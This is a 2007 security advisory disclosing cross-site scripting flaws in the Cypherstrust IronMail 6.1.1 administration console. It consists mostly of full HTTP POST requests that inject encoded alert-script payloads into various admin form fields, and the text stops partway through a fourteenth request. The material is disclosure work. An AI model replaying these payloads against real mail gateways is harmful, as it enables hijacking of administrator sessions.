=============================== - Advisory - =============================== Título: Multipls XSS in Cypherstrust Ironmail 6.1.1 Risk: Medium Date: 20.Feb.2007 Author: Javier Olascoaga WEB: http://www.514.es/ .: [ INTRO ] :. IronMail protects enterprise email systems from inbound threats: spam, viruses; or hackers trying to take down or take over the e-mail system. IronMail protects enterprise email systems from outbound threats: regulatory compliance violations , corporate policy violations, or theft ("leakage") of confidential information or intellectual property. IronMail protects enterprise email systems from threats that haven't even been identified yet. .: [ TECHNICAL DESCRIPTION ] :. During the development of the technical tests against the IronMail mail system have been detected several Cross Site Scripting vulnerabilities in the administration console of the product. Next you can find the XSS founded: .: [ XSS #1 ] :. POST https://172.0.0.2:10443/admin/systemRouting.do?method=submit HTTP/1.1 Referer: https://172.0.0.2:10443/admin/systemRouting.do?method=init&isMenuToggled=1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13 Host: 172.0.0.2:10443 Content-Length: 295 Cache-Control: no-cache Cookie: CTSecureToken=53DFBE4753D221B2707050E96902E98D_admin; itemToHighlight=https%3A//172.0.0.2%3A10443/admin/systemRouting.do%3Fmethod%3Dinit%26isMenuToggled%3D1; menusToExpand=%2CConfigurationMenu%2C; tabbedMenuSelected=11; /admin/queueManager.dofirsttimeload=1; /admin/queueManager.do=; JSESSIONID=B227892A258E91419C09469E49AED4D4 'rows%5B0%5D.networkId=172.16.0.0&rows%5B0%5D.netmaskId=255.255.0.0&rows%5B1%5D.networkId=192.168.0.0&rows%5B1%5D.netmaskId=255.255.0.0&network=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&netmask=128.0.0.0&defRouterIp=%27%3E%3Cscript%3Ealert%28%27SIA2%27%29%3C%2Fscript%3E&submit=Submit .: [ XSS #2 ] :. POST https://172.0.0.2:10443/admin/system_IronMail.do?method=saveNew HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Referer: https://172.0.0.2:10443/admin/system_IronMail.do?method=getDetail&isMenuToggled=1 Accept-Language: es-ES,en-us;q=0.5 Content-Type: application/x-www-form-urlencoded UA-CPU: x86 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13 Host: 172.0.0.2:10443 Content-Length: 343 Connection: Keep-Alive Cache-Control: no-cache Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin; tabbedMenuSelected=17; itemToHighlight=https%3A//172.0.0.2%3A10443/admin/system_IronMail.do%3Fmethod%3DgetDetail%26isMenuToggled%3D1; menusToExpand=%2CConfigurationMenu%2C; JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E Wmtu=1500&hostName=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&domainName=sytes.net&ipAddress=10.1.1.1&ipNetMask=255.255.255.224&defaultRouter=10.1.1.2&dns1=10.1.1.3&dns2=10.1.1.4&dns3=10.1.1.5&ntp1=time.nist.gov&ntp2=bitsy.mit.edu&ntp3=clock.isc.org&timeZone=Europe%2FMadridðernetSetting=autoselect&submit=Submit HTTP/1.0 200 OK Date: Mon, 19 Feb 2007 10:11:46 GMT Server: Apache Pragma: no-cache Cache-Control: no-store Expires: Thu, 01 Jan 1970 00:00:00 GMT Connection: close Content-Type: text/html; charset=utf-8 .: [ XSS #3 ] :. POST https://172.0.0.2:10443/admin/system_IronMail.do?method=saveNew HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Referer: https://172.0.0.2:10443/admin/system_IronMail.do?method=saveNew Accept-Language: es-ES,en-us;q=0.5 Content-Type: application/x-www-form-urlencoded UA-CPU: x86 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13 Host: 172.0.0.2:10443 Content-Length: 341 Connection: Keep-Alive Cache-Control: no-cache Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin; tabbedMenuSelected=17; itemToHighlight=https%3A//172.0.0.2%3A10443/admin/system_IronMail.do%3Fmethod%3DsaveNew; menusToExpand=%2CConfigurationMenu%2C; JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E Umtu=1500&hostName=mmail11&domainName=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&ipAddress=10.1.1.1&ipNetMask=255.255.255.224&defaultRouter=10.1.1.2&dns1=10.1.1.3&dns2=10.1.1.4&dns3=10.1.1.5&ntp1=time.nist.gov&ntp2=bitsy.mit.edu&ntp3=clock.isc.org&timeZone=Europe%2FMadridðernetSetting=autoselect&submit=Submit HTTP/1.0 200 OK Date: Mon, 19 Feb 2007 10:12:26 GMT Server: Apache Pragma: no-cache Cache-Control: no-store Expires: Thu, 01 Jan 1970 00:00:00 GMT Connection: close Content-Type: text/html; charset=utf-8 .: [ XSS #4 ] :. POST https://172.0.0.2:10443/admin/system_IronMail.do?method=saveNew HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Referer: https://172.0.0.2:10443/admin/system_IronMail.do?method=saveNew Accept-Language: es-ES,en-us;q=0.5 Content-Type: application/x-www-form-urlencoded UA-CPU: x86 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13 Host: 172.0.0.2:10443 Content-Length: 337 Connection: Keep-Alive Cache-Control: no-cache Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin; tabbedMenuSelected=17; itemToHighlight=https%3A//172.0.0.2%3A10443/admin/system_IronMail.do%3Fmethod%3DsaveNew; menusToExpand=%2CConfigurationMenu%2C; JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E Qmtu=1500&hostName=mmail11&domainName=sytes.net&ipAddress=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&ipNetMask=255.255.255.224&defaultRouter=10.1.1.2&dns1=10.1.1.3&dns2=10.1.1.4&dns3=10.1.1.5&ntp1=time.nist.gov&ntp2=bitsy.mit.edu&ntp3=clock.isc.org&timeZone=Europe%2FMadridðernetSetting=autoselect&submit=Submit HTTP/1.0 200 OK Date: Mon, 19 Feb 2007 10:12:31 GMT Server: Apache Pragma: no-cache Cache-Control: no-store Expires: Thu, 01 Jan 1970 00:00:00 GMT Connection: close Content-Type: text/html; charset=utf-8 .: [ XSS #5 ] :. POST https://172.0.0.2:10443/admin/system_IronMail.do?method=saveNew HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Referer: https://172.0.0.2:10443/admin/system_IronMail.do?method=saveNew Accept-Language: es-ES,en-us;q=0.5 Content-Type: application/x-www-form-urlencoded UA-CPU: x86 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13 Host: 172.0.0.2:10443 Content-Length: 337 Connection: Keep-Alive Cache-Control: no-cache Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin; tabbedMenuSelected=17; itemToHighlight=https%3A//172.0.0.2%3A10443/admin/system_IronMail.do%3Fmethod%3DsaveNew; menusToExpand=%2CConfigurationMenu%2C; JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E Qmtu=1500&hostName=mmail11&domainName=sytes.net&ipAddress=10.1.1.1&ipNetMask=255.255.255.224&defaultRouter=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&dns1=10.1.1.3&dns2=10.1.1.4&dns3=10.1.1.5&ntp1=time.nist.gov&ntp2=bitsy.mit.edu&ntp3=clock.isc.org&timeZone=Europe%2FMadridðernetSetting=autoselect&submit=Submit HTTP/1.0 200 OK Date: Mon, 19 Feb 2007 10:12:36 GMT Server: Apache Pragma: no-cache Cache-Control: no-store Expires: Thu, 01 Jan 1970 00:00:00 GMT Connection: close Content-Type: text/html; charset=utf-8 .: [ XSS #6 ] :. POST https://172.0.0.2:10443/admin/system_IronMail.do?method=saveNew HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Referer: https://172.0.0.2:10443/admin/system_IronMail.do?method=saveNew Accept-Language: es-ES,en-us;q=0.5 Content-Type: application/x-www-form-urlencoded UA-CPU: x86 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13 Host: 172.0.0.2:10443 Content-Length: 338 Connection: Keep-Alive Cache-Control: no-cache Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin; tabbedMenuSelected=17; itemToHighlight=https%3A//172.0.0.2%3A10443/admin/system_IronMail.do%3Fmethod%3DsaveNew; menusToExpand=%2CConfigurationMenu%2C; JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E Rmtu=1500&hostName=mmail11&domainName=sytes.net&ipAddress=10.1.1.1&ipNetMask=255.255.255.224&defaultRouter=10.1.1.2&dns1=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&dns2=10.1.1.4&dns3=10.1.1.5&ntp1=time.nist.gov&ntp2=bitsy.mit.edu&ntp3=clock.isc.org&timeZone=Europe%2FMadridðernetSetting=autoselect&submit=Submit HTTP/1.0 200 OK Date: Mon, 19 Feb 2007 10:12:41 GMT Server: Apache Pragma: no-cache Cache-Control: no-store Expires: Thu, 01 Jan 1970 00:00:00 GMT Connection: close Content-Type: text/html; charset=utf-8 .: [ XSS #7 ] :. POST https://172.0.0.2:10443/admin/system_IronMail.do?method=saveNew HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Referer: https://172.0.0.2:10443/admin/system_IronMail.do?method=saveNew Accept-Language: es-ES,en-us;q=0.5 Content-Type: application/x-www-form-urlencoded UA-CPU: x86 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13 Host: 172.0.0.2:10443 Content-Length: 340 Connection: Keep-Alive Cache-Control: no-cache Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin; tabbedMenuSelected=17; itemToHighlight=https%3A//172.0.0.2%3A10443/admin/system_IronMail.do%3Fmethod%3DsaveNew; menusToExpand=%2CConfigurationMenu%2C; JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E Tmtu=1500&hostName=mmail11&domainName=sytes.net&ipAddress=10.1.1.1&ipNetMask=255.255.255.224&defaultRouter=10.1.1.2&dns1=10.1.1.3&dns2=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&dns3=10.1.1.5&ntp1=time.nist.gov&ntp2=bitsy.mit.edu&ntp3=clock.isc.org&timeZone=Europe%2FMadridðernetSetting=autoselect&submit=Submit HTTP/1.0 200 OK Date: Mon, 19 Feb 2007 10:12:48 GMT Server: Apache Pragma: no-cache Cache-Control: no-store Expires: Thu, 01 Jan 1970 00:00:00 GMT Connection: close Content-Type: text/html; charset=utf-8 .: [ XSS #8 ] :. POST https://172.0.0.2:10443/admin/systemOutOfBand.do?method=saveNew HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Referer: https://172.0.0.2:10443/admin/systemOutOfBand.do?method=getDetail&isMenuToggled=1 Accept-Language: es-ES,en-us;q=0.5 Content-Type: application/x-www-form-urlencoded UA-CPU: x86 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13 Host: 172.0.0.2:10443 Content-Length: 154 Connection: Keep-Alive Cache-Control: no-cache Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin; tabbedMenuSelected=17; itemToHighlight=https%3A//172.0.0.2%3A10443/admin/systemOutOfBand.do%3Fmethod%3DgetDetail%26isMenuToggled%3D1; menusToExpand=%2CConfigurationMenu%2C; JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E outOfBand=true&mtu=1500&ipAddress=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3EðernetSetting=autoselect&ipNetMask=255.255.255.224&submit=Submit HTTP/1.0 200 OK Date: Mon, 19 Feb 2007 10:13:16 GMT Server: Apache Pragma: no-cache Cache-Control: no-store Expires: Thu, 01 Jan 1970 00:00:00 GMT Connection: close Content-Type: text/html; charset=utf-8 .: [ XSS #9 ] :. POST https://172.0.0.2:10443/admin/systemBackup.do?method=submit HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Referer: https://172.0.0.2:10443/admin/systemBackup.do?method=init&isMenuToggled=1 Accept-Language: es-ES,en-us;q=0.5 Content-Type: application/x-www-form-urlencoded UA-CPU: x86 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13 Host: 172.0.0.2:10443 Content-Length: 146 Connection: Keep-Alive Cache-Control: no-cache Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin; tabbedMenuSelected=17; itemToHighlight=https%3A//172.0.0.2%3A10443/admin/systemBackup.do%3Fmethod%3Dinit%26isMenuToggled%3D1; menusToExpand=%2CConfigurationMenu%2C; JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E password=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&confirmPassword=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&submit=Submit HTTP/1.0 200 OK Date: Mon, 19 Feb 2007 10:13:41 GMT Server: Apache Pragma: no-cache Cache-Control: no-store Expires: Thu, 01 Jan 1970 00:00:00 GMT Connection: close Content-Type: text/html; charset=utf-8 .: [ XSS #10 ] :. POST https://172.0.0.2:10443/admin/systemLicenseManager.do?method=submit HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Referer: https://172.0.0.2:10443/admin/systemLicenseManager.do?method=init&isMenuToggled=1 Accept-Language: es-ES,en-us;q=0.5 Content-Type: application/x-www-form-urlencoded UA-CPU: x86 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13 Host: 172.0.0.2:10443 Content-Length: 75 Connection: Keep-Alive Cache-Control: no-cache Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin; tabbedMenuSelected=17; itemToHighlight=https%3A//172.0.0.2%3A10443/admin/systemLicenseManager.do%3Fmethod%3Dinit%26isMenuToggled%3D1; menusToExpand=%2CConfigurationMenu%2C; JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E Klicense=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&submit=Submit HTTP/1.0 200 OK Date: Mon, 19 Feb 2007 10:20:28 GMT Server: Apache Pragma: no-cache Cache-Control: no-store Expires: Thu, 01 Jan 1970 00:00:00 GMT Connection: close Content-Type: text/html; charset=utf-8 .: [ XSS #11 ] :. POST https://172.0.0.2:10443/admin/systemWebAdminConfig.do?method=save HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Referer: https://172.0.0.2:10443/admin/systemWebAdminConfig.do?method=init&isMenuToggled=1&procId=90 Accept-Language: es-ES,en-us;q=0.5 Content-Type: application/x-www-form-urlencoded UA-CPU: x86 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13 Host: 172.0.0.2:10443 Content-Length: 1225 Connection: Keep-Alive Cache-Control: no-cache Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin; tabbedMenuSelected=15; itemToHighlight=https%3A//172.0.0.2%3A10443/admin/systemWebAdminConfig.do%3Fmethod%3Dinit%26isMenuToggled%3D1%26procId%3D90; menusToExpand=%2CConfigurationMenu%2CWebAdminConfigurationMenu%2CUserAccountMenu%2C; JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E procId=90&rows%5B0%5D.attrName=gui_log_level&rows%5B0%5D.attrType=12&rows%5B0%5D.attrValidate=%5BLabelValueBean%5BCRITICAL%2C+1%5D%2C+LabelValueBean%5BERROR%2C+4%5D%2C+LabelValueBean%5BINFORMATION%2C+5%5D%2C+LabelValueBean%5BDETAILED%2C+6%5D%5D&rows%5B0%5D.attrValidateStr=30060003%3A1%2C30060004%3A4%2C30060005%3A5%2C30060006%3A6&rows%5B0%5D.attrDepends=&rows%5B0%5D.multipleValue=0&rows%5B0%5D.modifyable=true&rows%5B0%5D.attrValueStrClone=4&rows%5B0%5D.langTagId=2000003&rows%5B0%5D.attrValue=4&rows%5B1%5D.attrName=gui_timeout&rows%5B1%5D.attrType=2&rows%5B1%5D.attrValidate=%5B1-30%5D&rows%5B1%5D.attrValidateStr=%5B1-30%5D&rows%5B1%5D.attrDepends=&rows%5B1%5D.multipleValue=0&rows%5B1%5D.modifyable=true&rows%5B1%5D.attrValueStrClone=30&rows%5B1%5D.langTagId=2001014&rows%5B1%5D.attrValueStr=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&rows%5B2%5D.attrName=auto_refresh&rows%5B2%5D.attrType=2&rows%5B2%5D.attrValidate=%5B1-30%5D&rows%5B2%5D.attrValidateStr=%5B1-30%5D&rows%5B2%5D.attrDepends=&rows%5B2%5D.multipleValue=0&rows%5B2%5D.modifyable=true&rows%5B2%5D.attrValueStrClone=4&rows%5B2%5D.langTagId=2001017&rows%5B2%5D.attrValueStr=%27%3E%3Cscript%3Ealert%28%27SIA2%27%29%3C%2Fscript%3E&submitValue=Submit HTTP/1.0 200 OK Date: Mon, 19 Feb 2007 10:21:27 GMT Server: Apache Pragma: no-cache Cache-Control: no-store Expires: Thu, 01 Jan 1970 00:00:00 GMT Connection: close Content-Type: text/html; charset=utf-8 .: [ XSS #12 ] :. POST https://172.0.0.2:10443/admin/ldap_ConfigureServiceProperties.do?method=save HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Referer: https://172.0.0.2:10443/admin/ldap_ConfigureServiceProperties.do?method=init&procId=164 Accept-Language: es-ES,en-us;q=0.5 Content-Type: application/x-www-form-urlencoded UA-CPU: x86 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13 Host: 172.0.0.2:10443 Content-Length: 2840 Connection: Keep-Alive Cache-Control: no-cache Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin; tabbedMenuSelected=11; itemToHighlight=https%3A//172.0.0.2%3A10443/admin/ldap_ConfigureServiceProperties.do%3Fmethod%3Dinit%26procId%3D164; menusToExpand=%2CConfigurationMenu%2CWebAdminConfigurationMenu%2CUserAccountMenu%2CUserPreferenceMenu%2CAlertManagerMenu%2CMailFirewallMenu%2CLDAPConfigurationMenu%2C; /admin/dnsProtection.dofirsttimeload=1; /admin/dnsProtection.do=; JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E procId=164&rows%5B0%5D.attrName=sync_time&rows%5B0%5D.attrType=2&rows%5B0%5D.attrValidate=%5B1-24%5D&rows%5B0%5D.attrValidateStr=%5B1-24%5D&rows%5B0%5D.attrDepends=&rows%5B0%5D.multipleValue=0&rows%5B0%5D.modifyable=true&rows%5B0%5D.attrValueStrClone=24&rows%5B0%5D.langTagId=2016401&rows%5B0%5D.attrValueStr=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&rows%5B1%5D.attrName=sync_results_count&rows%5B1%5D.attrType=2&rows%5B1%5D.attrValidate=%5B1-500%5D&rows%5B1%5D.attrValidateStr=%5B1-500%5D&rows%5B1%5D.attrDepends=&rows%5B1%5D.multipleValue=0&rows%5B1%5D.modifyable=true&rows%5B1%5D.attrValueStrClone=50&rows%5B1%5D.langTagId=2016402&rows%5B1%5D.attrValueStr=50&rows%5B2%5D.attrName=sync_rules_order&rows%5B2%5D.attrType=1&rows%5B2%5D.attrValidate=&rows%5B2%5D.attrValidateStr=&rows%5B2%5D.attrDepends=&rows%5B2%5D.multipleValue=1&rows%5B2%5D.modifyable=true&rows%5B2%5D.attrValueStrClone=&rows%5B2%5D.langTagId=2016403&rows%5B2%5D.attrValue=&rows%5B3%5D.attrName=ldap_fail_open&rows%5B3%5D.attrType=5&rows%5B3%5D.attrValidate=&rows%5B3%5D.attrValidateStr=&rows%5B3%5D.attrDepends=&rows%5B3%5D.multipleValue=0&rows%5B3%5D.modifyable=true&rows%5B3%5D.attrValueStrClone=1&rows%5B3%5D.langTagId=2016404&rows%5B3%5D.attrValue=true&rows%5B4%5D.attrName=ldap_failure_count&rows%5B4%5D.attrType=2&rows%5B4%5D.attrValidate=%5B1-50%5D&rows%5B4%5D.attrValidateStr=%5B1-50%5D&rows%5B4%5D.attrDepends=&rows%5B4%5D.multipleValue=0&rows%5B4%5D.modifyable=true&rows%5B4%5D.attrValueStrClone=3&rows%5B4%5D.langTagId=2016405&rows%5B4%5D.attrValueStr=3&rows%5B5%5D.attrName=ldap_monitor_intvl&rows%5B5%5D.attrType=2&rows%5B5%5D.attrValidate=%5B1-1440%5D&rows%5B5%5D.attrValidateStr=%5B1-1440%5D&rows%5B5%5D.attrDepends=&rows%5B5%5D.multipleValue=0&rows%5B5%5D.modifyable=true&rows%5B5%5D.attrValueStrClone=5&rows%5B5%5D.langTagId=2016406&rows%5B5%5D.attrValueStr=5&rows%5B6%5D.attrName=ldap_alert_type&rows%5B6%5D.attrType=12&rows%5B6%5D.attrValidate=%5BLabelValueBean%5BNo+Alert%2C+0%5D%2C+LabelValueBean%5BRESTART%2C+1%5D%2C+LabelValueBean%5BSHUTDOWN%2C+2%5D%2C+LabelValueBean%5BCRITICAL%2C+3%5D%2C+LabelValueBean%5BERROR%2C+4%5D%2C+LabelValueBean%5BWARNING%2C+5%5D%2C+LabelValueBean%5BNOTIFICATION%2C+6%5D%2C+LabelValueBean%5BINFORMATION%2C+7%5D%5D&rows%5B6%5D.attrValidateStr=30060019%3A0%2C30060007%3A1%2C30060008%3A2%2C30060003%3A3%2C30060004%3A4%2C30060009%3A5%2C30060010%3A6%2C30060005%3A7&rows%5B6%5D.attrDepends=&rows%5B6%5D.multipleValue=0&rows%5B6%5D.modifyable=true&rows%5B6%5D.attrValueStrClone=3&rows%5B6%5D.langTagId=2016407&rows%5B6%5D.attrValue=3&rows%5B7%5D.attrName=ldap_route_aft_masq&rows%5B7%5D.attrType=5&rows%5B7%5D.attrValidate=&rows%5B7%5D.attrValidateStr=&rows%5B7%5D.attrDepends=&rows%5B7%5D.multipleValue=0&rows%5B7%5D.modifyable=true&rows%5B7%5D.attrValueStrClone=0&rows%5B7%5D.langTagId=2016408&submitValue=Submit HTTP/1.0 200 OK Date: Mon, 19 Feb 2007 10:22:51 GMT Server: Apache Pragma: no-cache Cache-Control: no-store Expires: Thu, 01 Jan 1970 00:00:00 GMT Connection: close Content-Type: text/html; charset=utf-8 .: [ XSS #13 ] :. POST https://172.0.0.2:10443/admin/ldap_ConfigureServiceProperties.do?method=save HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Referer: https://172.0.0.2:10443/admin/ldap_ConfigureServiceProperties.do?method=save Accept-Language: es-ES,en-us;q=0.5 Content-Type: application/x-www-form-urlencoded UA-CPU: x86 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13 Host: 172.0.0.2:10443 Content-Length: 2840 Connection: Keep-Alive Cache-Control: no-cache Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin; tabbedMenuSelected=11; itemToHighlight=https%3A//172.0.0.2%3A10443/admin/ldap_ConfigureServiceProperties.do%3Fmethod%3Dinit%26procId%3D164; menusToExpand=%2CConfigurationMenu%2CWebAdminConfigurationMenu%2CUserAccountMenu%2CUserPreferenceMenu%2CAlertManagerMenu%2CMailFirewallMenu%2CLDAPConfigurationMenu%2C; /admin/dnsProtection.dofirsttimeload=1; /admin/dnsProtection.do=; JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E procId=164&rows%5B0%5D.attrName=sync_time&rows%5B0%5D.attrType=2&rows%5B0%5D.attrValidate=%5B1-24%5D&rows%5B0%5D.attrValidateStr=%5B1-24%5D&rows%5B0%5D.attrDepends=&rows%5B0%5D.multipleValue=0&rows%5B0%5D.modifyable=true&rows%5B0%5D.attrValueStrClone=24&rows%5B0%5D.langTagId=2016401&rows%5B0%5D.attrValueStr=24&rows%5B1%5D.attrName=sync_results_count&rows%5B1%5D.attrType=2&rows%5B1%5D.attrValidate=%5B1-500%5D&rows%5B1%5D.attrValidateStr=%5B1-500%5D&rows%5B1%5D.attrDepends=&rows%5B1%5D.multipleValue=0&rows%5B1%5D.modifyable=true&rows%5B1%5D.attrValueStrClone=50&rows%5B1%5D.langTagId=2016402&rows%5B1%5D.attrValueStr=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&rows%5B2%5D.attrName=sync_rules_order&rows%5B2%5D.attrType=1&rows%5B2%5D.attrValidate=&rows%5B2%5D.attrValidateStr=&rows%5B2%5D.attrDepends=&rows%5B2%5D.multipleValue=1&rows%5B2%5D.modifyable=true&rows%5B2%5D.attrValueStrClone=&rows%5B2%5D.langTagId=2016403&rows%5B2%5D.attrValue=&rows%5B3%5D.attrName=ldap_fail_open&rows%5B3%5D.attrType=5&rows%5B3%5D.attrValidate=&rows%5B3%5D.attrValidateStr=&rows%5B3%5D.attrDepends=&rows%5B3%5D.multipleValue=0&rows%5B3%5D.modifyable=true&rows%5B3%5D.attrValueStrClone=1&rows%5B3%5D.langTagId=2016404&rows%5B3%5D.attrValue=true&rows%5B4%5D.attrName=ldap_failure_count&rows%5B4%5D.attrType=2&rows%5B4%5D.attrValidate=%5B1-50%5D&rows%5B4%5D.attrValidateStr=%5B1-50%5D&rows%5B4%5D.attrDepends=&rows%5B4%5D.multipleValue=0&rows%5B4%5D.modifyable=true&rows%5B4%5D.attrValueStrClone=3&rows%5B4%5D.langTagId=2016405&rows%5B4%5D.attrValueStr=3&rows%5B5%5D.attrName=ldap_monitor_intvl&rows%5B5%5D.attrType=2&rows%5B5%5D.attrValidate=%5B1-1440%5D&rows%5B5%5D.attrValidateStr=%5B1-1440%5D&rows%5B5%5D.attrDepends=&rows%5B5%5D.multipleValue=0&rows%5B5%5D.modifyable=true&rows%5B5%5D.attrValueStrClone=5&rows%5B5%5D.langTagId=2016406&rows%5B5%5D.attrValueStr=5&rows%5B6%5D.attrName=ldap_alert_type&rows%5B6%5D.attrType=12&rows%5B6%5D.attrValidate=%5BLabelValueBean%5BNo+Alert%2C+0%5D%2C+LabelValueBean%5BRESTART%2C+1%5D%2C+LabelValueBean%5BSHUTDOWN%2C+2%5D%2C+LabelValueBean%5BCRITICAL%2C+3%5D%2C+LabelValueBean%5BERROR%2C+4%5D%2C+LabelValueBean%5BWARNING%2C+5%5D%2C+LabelValueBean%5BNOTIFICATION%2C+6%5D%2C+LabelValueBean%5BINFORMATION%2C+7%5D%5D&rows%5B6%5D.attrValidateStr=30060019%3A0%2C30060007%3A1%2C30060008%3A2%2C30060003%3A3%2C30060004%3A4%2C30060009%3A5%2C30060010%3A6%2C30060005%3A7&rows%5B6%5D.attrDepends=&rows%5B6%5D.multipleValue=0&rows%5B6%5D.modifyable=true&rows%5B6%5D.attrValueStrClone=3&rows%5B6%5D.langTagId=2016407&rows%5B6%5D.attrValue=3&rows%5B7%5D.attrName=ldap_route_aft_masq&rows%5B7%5D.attrType=5&rows%5B7%5D.attrValidate=&rows%5B7%5D.attrValidateStr=&rows%5B7%5D.attrDepends=&rows%5B7%5D.multipleValue=0&rows%5B7%5D.modifyable=true&rows%5B7%5D.attrValueStrClone=0&rows%5B7%5D.langTagId=2016408&submitValue=Submit HTTP/1.0 200 OK Date: Mon, 19 Feb 2007 10:22:56 GMT Server: Apache Pragma: no-cache Cache-Control: no-store Expires: Thu, 01 Jan 1970 00:00:00 GMT Connection: close Content-Type: text/html; charset=utf-8 .: [ XSS #14 ] :. POST 